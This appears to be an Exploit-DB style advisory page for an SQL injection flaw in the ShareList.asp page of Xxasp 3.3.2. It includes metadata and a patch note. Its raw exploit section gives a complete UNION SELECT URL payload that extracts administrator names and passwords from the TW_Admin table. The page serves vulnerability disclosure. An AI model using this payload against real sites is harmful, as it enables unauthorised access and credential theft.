Xxasp 3.3.2 SQL Injection Vulnerability

vendor:

Xxasp

by:

Secu_lab_ir@yahoo.com

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: Xxasp

Affected Version From: 3.3.2002

Affected Version To: 3.3.2002

Patch Exists: YES

Related CWE: N/A

CPE: a:xxasp:xxasp:3.3.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Xxasp 3.3.2 SQL Injection Vulnerability

A SQL injection vulnerability was discovered in Xxasp 3.3.2. An attacker can exploit this vulnerability to gain access to the administrator's credentials by sending a specially crafted HTTP request to the vulnerable application. This can be done by appending a malicious SQL query to the 'SearchCondition' parameter of the 'ShareList.asp' page.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of Xxasp.

Source

Exploit-DB raw data:

########################## Securitylab.ir ########################
# Application Info:
# Name: Xxasp
# Version: 3.3.2
#################################################################
# Discoverd By: Secu_lab_ir@yahoo.com
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
#===========================================================
# http://server/disk/ShareList.asp?Action=Main&SearchType=SearchFileType&SearchCondition=rar' and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,AdminName,AdminPwd,14,15,16,17 from TW_Admin where '1'='1
#===========================================================
#################################################################
# Security Research Team
###################################################################